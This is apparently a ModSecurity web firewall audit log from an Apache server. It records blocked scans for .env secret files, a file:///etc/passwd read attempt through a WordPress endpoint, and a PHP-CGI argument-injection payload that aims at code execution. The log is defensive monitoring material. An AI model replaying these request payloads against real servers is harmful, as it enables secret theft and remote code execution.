Intercepted (phase 1) Stopwatch: 1749340706603255 755 (- - -) Stopwatch2: 1749340706603255 755; combined=334, p1=302, p2=0, p3=0, p4=0, p5=32, sr=140, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cded3e69-Z-- --23c8aa18-A-- [08/Jun/2025:07:39:28 +0700] aETbwIsoVckF-yt1MVzGJAAAAMg 103.236.140.4 49792 103.236.140.4 8181 --23c8aa18-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.135.193.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.135.193.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/65.0.3325.181 Chrome/65.0.3325.181 Safari/537.36 Accept-Charset: utf-8 --23c8aa18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23c8aa18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749343168214854 933 (- - -) Stopwatch2: 1749343168214854 933; combined=413, p1=365, p2=0, p3=0, p4=0, p5=48, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23c8aa18-Z-- --75456542-A-- [08/Jun/2025:07:39:40 +0700] aETbzMCyjFxjzV1Pwa0mVQAAABg 103.236.140.4 49796 103.236.140.4 8181 --75456542-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.135.193.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.135.193.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --75456542-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75456542-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749343180068331 859 (- - -) Stopwatch2: 1749343180068331 859; combined=345, p1=302, p2=0, p3=0, p4=0, p5=42, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75456542-Z-- --c9072d0c-A-- [08/Jun/2025:07:40:08 +0700] aETb6IsoVckF-yt1MVzGJQAAAMo 103.236.140.4 49798 103.236.140.4 8181 --c9072d0c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.135.193.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.135.193.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-A600G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --c9072d0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9072d0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749343208126988 901 (- - -) Stopwatch2: 1749343208126988 901; combined=418, p1=380, p2=0, p3=0, p4=0, p5=38, sr=178, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9072d0c-Z-- --17ef971b-A-- [08/Jun/2025:07:40:10 +0700] aETb6sCyjFxjzV1Pwa0mVgAAAAI 103.236.140.4 49800 103.236.140.4 8181 --17ef971b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.135.193.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.135.193.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/8.0.57838 Mobile/12H321 Safari/600.1.4 Accept-Charset: utf-8 --17ef971b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17ef971b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749343210127929 655 (- - -) Stopwatch2: 1749343210127929 655; combined=259, p1=224, p2=0, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17ef971b-Z-- --a05a8503-A-- [08/Jun/2025:07:40:11 +0700] aETb66D1_iznf-QmBECDNQAAAIM 103.236.140.4 49802 103.236.140.4 8181 --a05a8503-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.135.193.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.135.193.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36 Accept-Charset: utf-8 --a05a8503-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a05a8503-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749343211324961 671 (- - -) Stopwatch2: 1749343211324961 671; combined=260, p1=225, p2=0, p3=0, p4=0, p5=35, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a05a8503-Z-- --3a7f9c0d-A-- [08/Jun/2025:07:56:52 +0700] aETf1Me0OZpePEzoRnpEMgAAAEM 103.236.140.4 50376 103.236.140.4 8181 --3a7f9c0d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.132 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.132 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --3a7f9c0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a7f9c0d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749344212264326 929 (- - -) Stopwatch2: 1749344212264326 929; combined=417, p1=377, p2=0, p3=0, p4=0, p5=40, sr=167, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a7f9c0d-Z-- --171c9c15-A-- [08/Jun/2025:07:56:53 +0700] aETf1aD1_iznf-QmBECDXAAAAI4 103.236.140.4 50380 103.236.140.4 8181 --171c9c15-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.132 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.132 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --171c9c15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --171c9c15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749344213493952 755 (- - -) Stopwatch2: 1749344213493952 755; combined=292, p1=256, p2=0, p3=0, p4=0, p5=36, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --171c9c15-Z-- --10eb3931-A-- [08/Jun/2025:08:06:42 +0700] aETiIse0OZpePEzoRnpE1wAAAEA 103.236.140.4 52218 103.236.140.4 8181 --10eb3931-B-- GET /wp-admin/admin-ajax.php?action=proxy_image&url=file:///etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 169.197.140.18 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 169.197.140.18 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 Accept: */* --10eb3931-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10eb3931-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:url. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:url: file:/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749344802068791 1740 (- - -) Stopwatch2: 1749344802068791 1740; combined=775, p1=414, p2=323, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10eb3931-Z-- --37a06248-A-- [08/Jun/2025:08:06:42 +0700] aETiIse0OZpePEzoRnpE2AAAAFU 103.236.140.4 52214 103.236.140.4 8181 --37a06248-B-- GET /wp-admin/admin-ajax.php?action=proxy_image&url=file:///etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 169.197.140.18 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 169.197.140.18 Accept-Encoding: gzip X-Varnish: 170239857 --37a06248-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --37a06248-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:url. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:url: file:/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749344802200011 1663 (- - -) Stopwatch2: 1749344802200011 1663; combined=608, p1=333, p2=249, p3=0, p4=0, p5=26, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37a06248-Z-- --f3d6964a-A-- [08/Jun/2025:08:37:30 +0700] aETpWqD1_iznf-QmBECE6AAAAJM 103.236.140.4 52758 103.236.140.4 8181 --f3d6964a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; moto x4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36 Accept-Charset: utf-8 --f3d6964a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3d6964a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749346650951364 755 (- - -) Stopwatch2: 1749346650951364 755; combined=316, p1=279, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3d6964a-Z-- --6ba10711-A-- [08/Jun/2025:08:45:40 +0700] aETrRMCyjFxjzV1Pwa0nXgAAAAE 103.236.140.4 52868 103.236.140.4 8181 --6ba10711-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --6ba10711-C-- --6ba10711-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ba10711-E-- --6ba10711-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749347140597175 4128 (- - -) Stopwatch2: 1749347140597175 4128; combined=2195, p1=521, p2=1631, p3=0, p4=0, p5=43, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ba10711-Z-- --a7c7b948-A-- [08/Jun/2025:09:03:56 +0700] aETvjMCyjFxjzV1Pwa0nZwAAABE 103.236.140.4 53144 103.236.140.4 8181 --a7c7b948-B-- GET /production/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20120724 Debian Iceweasel/15.02 Accept-Charset: utf-8 --a7c7b948-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7c7b948-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749348236996891 925 (- - -) Stopwatch2: 1749348236996891 925; combined=420, p1=378, p2=0, p3=0, p4=0, p5=41, sr=148, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7c7b948-Z-- --f54efc02-A-- [08/Jun/2025:09:30:51 +0700] aET128e0OZpePEzoRnpE8QAAAFA 103.236.140.4 53252 103.236.140.4 8181 --f54efc02-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 46.101.117.67 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 46.101.117.67 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --f54efc02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f54efc02-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749349851242812 854 (- - -) Stopwatch2: 1749349851242812 854; combined=340, p1=299, p2=0, p3=0, p4=0, p5=41, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f54efc02-Z-- --7791d145-A-- [08/Jun/2025:09:43:58 +0700] aET47se0OZpePEzoRnpE9wAAAEU 103.236.140.4 53306 103.236.140.4 8181 --7791d145-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SAMSUNG-SM-G900A Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.94 Mobile Safari/537.36 Accept-Charset: utf-8 --7791d145-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7791d145-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749350638133991 809 (- - -) Stopwatch2: 1749350638133991 809; combined=339, p1=301, p2=0, p3=0, p4=0, p5=38, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7791d145-Z-- --fcce6f4f-A-- [08/Jun/2025:10:13:35 +0700] aET_36D1_iznf-QmBECFNQAAAJQ 103.236.140.4 53886 103.236.140.4 8181 --fcce6f4f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/53.0 --fcce6f4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcce6f4f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749352415836572 788 (- - -) Stopwatch2: 1749352415836572 788; combined=391, p1=353, p2=0, p3=0, p4=0, p5=37, sr=149, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcce6f4f-Z-- --f7756721-A-- [08/Jun/2025:10:13:36 +0700] aET_4IsoVckF-yt1MVzIrQAAANg 103.236.140.4 53888 103.236.140.4 8181 --f7756721-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; itel it1407; Android/4.4.2; Release/11.19.2015) AppleWebKit/534.30 (KHTML, like Gecko) Mobile Safari/534.30 --f7756721-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7756721-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749352416264210 714 (- - -) Stopwatch2: 1749352416264210 714; combined=321, p1=281, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7756721-Z-- --22ff7a14-A-- [08/Jun/2025:13:20:45 +0700] aEUrvcCyjFxjzV1Pwa0x2gAAAAA 103.236.140.4 37206 103.236.140.4 8181 --22ff7a14-B-- GET /shop/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept-Charset: utf-8 --22ff7a14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22ff7a14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749363645725485 705 (- - -) Stopwatch2: 1749363645725485 705; combined=267, p1=232, p2=0, p3=0, p4=0, p5=34, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22ff7a14-Z-- --0cad7f2b-A-- [08/Jun/2025:13:51:34 +0700] aEUy9se0OZpePEzoRnpSYQAAAEQ 103.236.140.4 49506 103.236.140.4 8181 --0cad7f2b-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 207.154.212.47 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 207.154.212.47 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --0cad7f2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0cad7f2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749365494975491 805 (- - -) Stopwatch2: 1749365494975491 805; combined=359, p1=324, p2=0, p3=0, p4=0, p5=34, sr=122, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0cad7f2b-Z-- --c43a6849-A-- [08/Jun/2025:14:09:01 +0700] aEU3DaD1_iznf-QmBECSgQAAAIY 103.236.140.4 49662 103.236.140.4 8181 --c43a6849-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 138.68.86.32 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 138.68.86.32 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --c43a6849-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c43a6849-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s 